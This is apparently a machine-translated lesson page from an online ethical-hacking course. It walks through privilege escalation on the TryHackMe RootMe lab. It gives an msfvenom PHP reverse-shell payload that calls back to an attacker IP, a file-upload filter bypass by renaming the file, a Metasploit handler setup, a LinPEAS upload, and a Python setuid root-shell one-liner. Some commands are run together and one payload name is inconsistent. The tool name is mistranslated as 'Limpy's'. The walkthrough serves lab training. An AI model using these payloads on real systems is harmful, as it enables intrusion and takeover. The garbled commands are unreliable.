You don't have access to this class

Keep learning! Join and start boosting your career

Aprovecha el precio especial y haz tu profesi贸n a prueba de IA

Antes: $249

Currency
$209
Suscr铆bete

Termina en:

2 D铆as
3 Hrs
35 Min
52 Seg

Escalada de Privilegios con Binarios

15/17
Resources

How to escalate privileges on Linux using Metasploit and Limpy's?

In the exciting world of cybersecurity, the ability to escalate privileges on a Linux system can be a powerful and necessary tool. In this lesson, we will address how to use tools to accomplish this task, specifically through the use of Metasploit and Limpy's. We will explore each step in a clear manner, providing a thorough understanding of the techniques employed.

What is the first step in privilege escalation?

To begin, it is important to understand the concept of privilege escalation. It refers to the process by which an unprivileged user acquires full access to a system, allowing him to perform restricted operations. We start with the analysis of the virtual system, for which we will use a TryHackMe machine, specifically the RootMe machine.

  1. Starting the virtual machine: We start by starting the TryHackMe virtual machine and obtaining the necessary IP address.

  2. Environment configuration: We use Kali Linux to browse the virtual machine and explore the available routes and services. Tools like Nmap and DirBuster are essential for this preliminary information process.

How to obtain a shell and use Metasploit?

The next essential step is to obtain a shell on the system. A shell allows us to execute remote commands on the server. To achieve this, different paths can be followed:

  1. File upload: Through a web application observable from the virtual machine, we find a vulnerable point that allows file uploads. Exploiting this vulnerability is crucial.

  2. Creation of a malicious PHP file: We use Metasploit and its MSFVenom tool to create a PHP file. This file, when executed, will provide us with a shell connection.

    msfvenom -p php/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw > shell.php
  3. Upload the file and bypass protections: If there is a simple filter that blocks PHP files, we rename the file to shell.phtml or shell.php5 to bypass these restrictions.

  4. Connection with Metasploit: We configure a handler in Metasploit to wait for incoming connections.

    use exploit/multi/handlerset payload php/meterpreter_reverse_tcpset LHOST <YOUR_IP>set LPORT 4444

How to analyze the system with Limpy's and escalate privileges?

With a Meterpreter shell already set up, we move on to analyze the system for privilege escalation paths using Limpy's.

  1. UploadLimpy's to the system: We use Meterpreter to transfer and run the Limpy's script, which will scan the system for vulnerabilities.

    upload /home/kali/Desktop/linpeas.sh /tmp/linpeas.shchmod +x /tmp/linpeas.sh/tmp/linpeas.sh
  2. Identify scaling vectors: Limpy's provides a list of possible scaling vectors, including binaries that can be run with elevated privileges.

How to leverage binaries like Python to escalate privileges?

GTFOBins is an excellent source that details how to use Linux binaries to escalate privileges. In the case of identifying the Python binary as executable:

  1. GTFOBins query: we look for the specific binary to obtain the escalation command. For Python, the following command allows us to obtain a shell with root privileges.

    python -c 'import os; os.setuid(0); os.system("/bin/sh")'
  2. Execute in the shell: In our shell obtained through Meterpreter, we execute the command and verify the user change.

    whoami

    If the execution is successful, the system should indicate that we are now root.

This systematic approach is not only a great example of how to deal with ethical cybersecurity situations, but also provides the basis for further exploration and learning in this fascinating field.

Contributions 4

Questions 0

Sort by:

Want to see more contributions, questions and answers from the community?

Try Hack Me > RootMe

GTFOBins > Reune todos los binarios de Linux para poder aprovecharlos en la escalada de privilegios.

https://www.revshells.com/ esta pagina tambi茅n puede ser de ayuda para crear reverse shell, as铆 como lo que hizo para el archivo php

Para no salir de la consola de Kali al renombrar el shell. Solo pongan: mv shell.php shell.php5 (shell.php es el nombre original y el otro el nuevo nombre que quieran poner)
use exploit/multi/handler